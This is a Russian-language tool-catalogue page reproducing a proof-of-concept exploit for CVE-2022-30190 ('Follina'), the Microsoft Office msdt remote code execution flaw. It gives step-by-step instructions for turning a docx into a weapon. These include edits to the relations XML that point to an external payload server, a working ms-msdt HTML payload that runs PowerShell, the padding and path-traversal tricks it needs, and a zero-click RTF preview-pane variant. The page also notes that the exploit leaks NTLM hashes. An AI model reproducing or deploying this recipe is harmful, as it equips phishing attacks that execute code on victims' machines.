Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
PoC-CVE-2022-30190 — POC CVE-2022-30190 : CVE 0-day MS Offic RCE aka msdt follina | Kitploit
Инструменты/GitHubGitHub/jmousqueton/poc-cve-2022-30190
Phishing ToolsPayload GenerationVulnerability AnalysisExploitationLateral MovementWeb Application ExploitationCommand and Control
GitHubjmousqueton/poc-cve-2022-30190

PoC-CVE-2022-30190

POC CVE-2022-30190 : CVE 0-day MS Offic RCE aka msdt follina

Репозиторий
157524 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

POC CVE-2022-30190 : CVE 0-day MS Offic RCE aka msdt follina

Информация: Новый нулевой день Microsoft Office используется в атаках для выполнения PowerShell

Краткое описание

29 мая 2022 года команда Nao_Sec, независимая группа исследователей кибербезопасности, обнаружила вредоносный документ Office, загруженный на Virustotal. Этот документ использует необычную, но известную схему для заражения жертв. Схема не была распознана как вредоносная некоторыми EDR, такими как Microsoft Defender for Endpoint. Эта уязвимость может привести к выполнению кода без необходимости взаимодействия с пользователем, так как она не включает макросы, за исключением случая, когда включен режим Protected View. Номер CVE пока не присвоен.

Технические детали

Уязвимость эксплуатируется с использованием схемы URI MSProtocol для загрузки некоторого кода. Злоумышленники могут встраивать вредоносные ссылки в документы Microsoft Office, шаблоны или электронные письма, начинающиеся с ms-msdt:, которые будут загружены и выполнены без участия пользователя — за исключением случая, когда включен режим Protected View. Тем не менее, преобразование документа в формат RTF также может обойти функцию Protected View.

Доказательство концепции

Файлы MS Office docx могут содержать внешние ссылки на OLE-объекты в виде HTML-файлов. Существует схема HTML «ms-msdt:», которая вызывает диагностический инструмент msdt, способный выполнять произвольный код (заданный в параметрах).

Результатом является устрашающий вектор атаки для получения RCE при открытии вредоносных docx-файлов (без использования макросов).

Вот шаги для создания Proof-of-Concept docx:

  1. Откройте Word (использовалась актуальная версия 2019 Pro, 16.0.10386.20017), создайте фиктивный документ, вставьте (OLE) объект (как растровое изображение), сохраните в формате docx.

  2. Отредактируйте word/_rels/document.xml.rels в структуре docx (это обычный zip). Измените XML-тег <Relationship> с атрибутом

root@kitploit:~
Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"

и Target="embeddings/oleObject1.bin", изменив значение Target и добавив атрибут TargetMode:

root@kitploit:~
Target = "http://<payload_server>/payload.html!"
TargetMode = "External"

Обратите внимание на значение Id (вероятно, это «rId5»).

  1. Отредактируйте word/document.xml. Найдите тег «<o:OLEObject ..>» (с r:id="rId5") и измените атрибут с Type="Embed" на Type="Link", а также добавьте атрибут UpdateMode="OnCall".

ПРИМЕЧАНИЕ: Созданный вредоносный docx почти такой же, как для CVE-2021-44444.

  1. Разместите HTML-пейлоад PoC (запуск calc.exe) со схемой ms-msdt по адресу http://<payload_server>/payload.html:
root@kitploit:~
<!doctype html>
<html lang="en">
<body>
<script>
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA should be repeated >60 times
  window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=cal?c IT_SelectProgram=NotListed IT_BrowseForFile=h$(IEX('calc.exe'))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe \"";
</script>

</body>
</html>

Обратите внимание, что:

  • строка комментария с AAA должна повторяться >60 раз (минимум 4096 байт).
  • как минимум, два обхода каталога /../ были необходимы в начале параметра IT_BrowseForFile
  • код, обёрнутый в $(), будет выполнен через PowerShell, но пробелы его сломают
  • «.exe» должна быть последней конечной строкой в конце параметра IT_BrowseForFile

Кроме того, инициирующий пейлоад может обращаться к удалённым ресурсам. Хотя это вряд ли вызовет запуск недоверенного двоичного файла, соединение всё равно будет передавать NTLM-хеши (что означает, что злоумышленники получают хеш пароля Windows жертвы), которые могут быть использованы для дальнейшей пост-эксплуатации.

БОНУС (0-click RTF-версия)

Если вы также добавите эти элементы под элементом <o:OLEObject> в word/document.xml на шаге 3:

root@kitploit:~
<o:LinkType>EnhancedMetaFile</o:LinkType>
<o:LockedField>false</o:LockedField>
<o:FieldCodes>\f 0</o:FieldCodes>

то это будет работать также в формате RTF (откройте полученный docx и сохраните его как RTF).

С RTF нет необходимости открывать файл в Word, достаточно просмотреть файл в панели предварительного просмотра. Панель предварительного просмотра запускает внешний HTML-пейлоад, и RCE получается без каких-либо кликов.

Источники:

  • https://nao-sec.org/about
  • https://www.virustotal.com/gui/file/4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784/detection
  • https://gist.github.com/tothi/66290a42896a97920055e50128c9f040 (исходный код)
  • https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/
  • https://github.com/sinjap/PoC-CVE-2022-30190 (дополнительная информация)
  • https://github.com/JohnHammond/msdt-follina (скрипт)
Скачать инструмент